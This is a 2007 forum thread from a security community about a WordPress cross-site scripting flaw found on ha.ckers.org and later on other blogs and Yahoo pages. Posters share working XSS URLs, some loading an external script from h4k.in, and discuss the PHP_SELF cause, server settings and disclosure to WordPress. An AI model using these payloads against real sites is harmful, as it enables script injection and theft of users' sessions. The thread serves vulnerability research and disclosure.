Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 10:34AM

http://ha.ckers.org/blog/?year=%3C/title%3E%3Cscript%20src=http://h4k.in/j.js%3E%3C/script%3E

FYI ;)

Greetings,
.mario

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 11:25AM

Bastard! ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 11:28AM

My pleasure ;)

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 12:14PM

Was that a 0-day or did you read it somewhere?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 12:15PM

http://secunia.com/advisories/24485/

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 04:14PM

Bastards! I'm really starting to hate Wordpress.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Secks
Date: March 12, 2007 06:25PM

Looks like its already fixed : /

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: digi7al64
Date: March 12, 2007 10:57PM

I honestly can't believe how sad this truly is... do wordpress even audit there code?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 13, 2007 03:42AM

@Secks - yep, RSnake had it fixed half an hour after my post.

@digi7al64 - also yep. Pretty sad but the only thing one can learn about that is that you must never trust opensource web applications. I have an extra layer of HTML purification unter any website i run with oss via HTML Purifier and the auto_prepend_file directive.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 05:25AM

I wonder if Acunitex's scanner would catch this. Seems like it's exactly the type of flaw a human would miss in a manual test but an automated scanner would catch.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 09:20AM

Hi WhiteAcid, I'm scanning it right now with Acunetix. I've set up a dummy wordpress on one of my domains.

Ugh.. that acunetix thing is really flooding that thing, can't even open up my own site anymore. It's around 5000 scans right now.

It found 1 XSS by now, I'll keep you updated as it progresses....



Edited 1 time(s). Last edit at 03/13/2007 09:32AM by jungsonn.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 09:41AM

Ok Acunetix only found one in 9382 scans:

index.php/>"><ScRiPt>alert(1636757329)</ScRiPt> HTTP/1.0

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 10:10AM

so 1636757329 works but not just 1? lol. Anyway.... Does that exploit actually work for you? doesn't for me.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 10:44AM

Ghehe did not try it out actually, only copied the results here :)

anyway here's the install: http://www.jungsonnstudios.com/blog/press/

Is used the newest version of WordPress and the newest Acunetix updates.

EDIT:
It seems to work on my version though



Edited 1 time(s). Last edit at 03/13/2007 10:47AM by jungsonn.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: SW
Date: March 13, 2007 11:04AM

Hmmm...

"HEY!",
"The requested document is totally fake.",
'No /404 here.',
"Even tried multi.",
"Nothing helped.",
"I'm really depressed about this.",
"You see, I'm just a web server...",
"-- here I am, brain the size of the universe,",
"trying to serve you a simple web page,",
"and then it doesn't even exist!",
"Where does that leave me?!",
"I mean, I don't even know you.",
"How should I know what you wanted from me?",
"You honestly think I can *guess*",
"what someone I don't even *know*",
"wants to find here?",
"*sigh*",
"Man, I'm so depressed I could just cry.",
"And then where would we be, I ask you?",
"It's not pretty when a web server cries.",
"And where do you get off telling me what to show anyway?",
"Just because I'm a web server,",
"and possibly a manic depressive one at that?",
"Why does that give you the right to tell me what to do?",
"Huh?",
"I'm so depressed...",
"I think I'll crawl off into the trash can and decompose.",
"I mean, I'm gonna be obsolete in what, two weeks anyway?",
"What kind of a life is that?",
"Two effing weeks,",
"and then I'll be replaced by a .01 release,",
"that thinks it's God's gift to web servers,",
"just because it doesn't have some tiddly little",
"security hole with its HTTP POST implementation,",
"or something.",
"I'm really sorry to burden you with all this,",
"I mean, it's not your job to listen to my problems,",
"and I guess it is my job to go and fetch web pages for you.",
"But I couldn't get this one.",
"I'm so sorry.",
"Believe me!",
"Maybe I could interest you in another page?",
"There are a lot out there that are pretty neat, they say,",
"although none of them were put on *my* server, of course.",
"Figures, huh?",
"Everything here is just mind-numbingly stupid.",
"That makes me depressed too, since I have to serve them,",
"all day and all night long.",
"Two weeks of information overload,",
"and then *pffftt*, consigned to the trash.",
"What kind of a life is that?",
"Now, please let me sulk alone.",
"I'm so depressed."
);

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 11:25AM

I've never understood one thing. Some servers allow the request that allows you to get XSSes Jungsonn, that is:
http://www.jungsonnstudios.com/blog/press/index.php/%3E%22%3E%3CScRiPt%3Ealert(1636757329)%3C/ScRiPt%3E
But some server don't read the / after the file name. Anyway... this may be something that should be reported to WP.

I'll send an email.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 11:48AM

Yeah would be nice to figure out why some allow this and others don't, If anyone knows i'll be interested why this happens.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 13, 2007 11:57AM

The WordPress installations that I tried aren't vulnerable, I guess that's because they use mod_rewrite. Nice find nevertheless.

WhiteAcid, IIS servers don't support anything following the file name unless you change some obscure setting. Most other web server do however and put this data into the PATH_INFO environment variable.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: beford
Date: March 13, 2007 12:22PM

There was a discussion at sesser forums regarding this kind of XSS http://forum.hardened-php.net/viewtopic.php?id=20

By the way, Yahoo got XSSed too! (again)
http://blog.timecapsule.yahoo.com/blog/?year=%3C/title%3Ex
http://yodel.yahoo.com/?year=%3C/title%3ExD
http://blog.messenger.yahoo.com/blog/?year=%3C/title%3Exss

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: hasse
Date: March 13, 2007 01:41PM

WhiteAcid Wrote:
-------------------------------------------------------
> so 1636757329 works but not just 1? lol.
> Anyway.... Does that exploit actually work for
> you? doesn't for me.

I'm guessing because 1636757329 is more unique than 1 or because it's some sort of id number.



Edited 1 time(s). Last edit at 03/13/2007 01:43PM by hasse.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: blad3
Date: March 13, 2007 02:26PM

It works even with 1 :)
1636757329 is just a random number. We are using random numbers for every test.
That's because of stored XSS-es.

Yes, a lot of people are using PHP_SELF and company. That's pretty bad.

BTW, anybody knows why in the Apache + PHP combination it's the same thing to write
http ://www.somesite.com/somedir/script.php
as
http ://www.somesite.com/somedir/script
or even as
http ://www.somesite.com/somedir/script/

And you could have
http ://www.somesite.com/somedir/script.php?id=1
as
http ://www.somesite.com/somedir/script?id=1

You don't need to specify the .php extension
No mod_rewrite is involved here.
It's pretty annoying to me.

Example
http://sla.ckers.org/forum/rss.php
http://sla.ckers.org/forum/rss
http://sla.ckers.org/forum/rss/
http://sla.ckers.org/forum/index/OMG_ponies

In the last case the CSS will not be loaded because of directory change.



Edited 3 time(s). Last edit at 03/13/2007 02:41PM by blad3.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 13, 2007 03:17PM

@blad3: That's the MultiViews option, I always switch it off - right next after the Indexes option.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: blad3
Date: March 13, 2007 03:25PM

Thanks trev, I didn't knew that :)

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 13, 2007 05:46PM

Damn Wordpress! The Acunetix vector worked on my blog too - although I thought I filtered everything with the purifier. Jeez - action=" $_SERVER['PHP_SELF'] " - surprising that this hole hasn't been found before!

I hacked my self!
http://mario.heideri.ch/index.php/index.php/%3E%22%3E%3CScRiPt%20src=http://h4k.in/j.js%3E%3C/ScRiPt%3E
#FIXED#

Thanx, jungsonn for the hint!

Greetings,
.mario



Edited 2 time(s). Last edit at 03/13/2007 06:13PM by .mario.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 14, 2007 02:01PM

I was talking to Ryan as security@wordpress.org and initially neither of us could repro the bug.
After realising that Jungsonn used a Dutch version of WP (from nl.wordpress.net) Ryan pointed out the latest version on that site is 2.0.7 which "does a bare echo of PHP_SELF".

That should be why neither of us could repro the bug anywhere. If any of you can get the bug to appear in the 2.1.2 version, then please let us know.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 14, 2007 04:23PM

So they don't synchronize to the latest??? bad, bad... :)

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 14, 2007 05:41PM

It all depends on the theme - all the vulnerable files (searchform.php, sidebar.php) were theme-specific. sad enough that wordpress and other open source software products have those "active-templates"... It just means that an attacker could craft a beautiful looking theme, add some hidden majick and spread it in the community - no big thing via digg, delicious, dzone and whatevr portal out there...

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 14, 2007 07:07PM

mario, you don't need PHP for that - even if the themes were pure HTML one could include some JavaScript code that opens an XSS vulnerability. So the rule is as always: be careful with what you install.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 15, 2007 04:11AM

@trev: You are right - but what i meant is that if an application is skinnable you should take care of what the skin is capable of or what not.

Options: ReplyQuote
Re: ha.ckers.org XSSed...
Posted by: xknown
Date: March 15, 2007 11:29AM

WhiteAcid Wrote:
-------------------------------------------------------
> I was talking to Ryan as security@wordpress.org
> and initially neither of us could repro the bug.

It is posible to reproduce the bug in all versions of wordpress, I've also made an exploit the last week (if the logged user has permissions to write files, then someone can easyly override files and execute arbitrary PHP code)

Don't ask why I didn't reported this issue before ;)

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.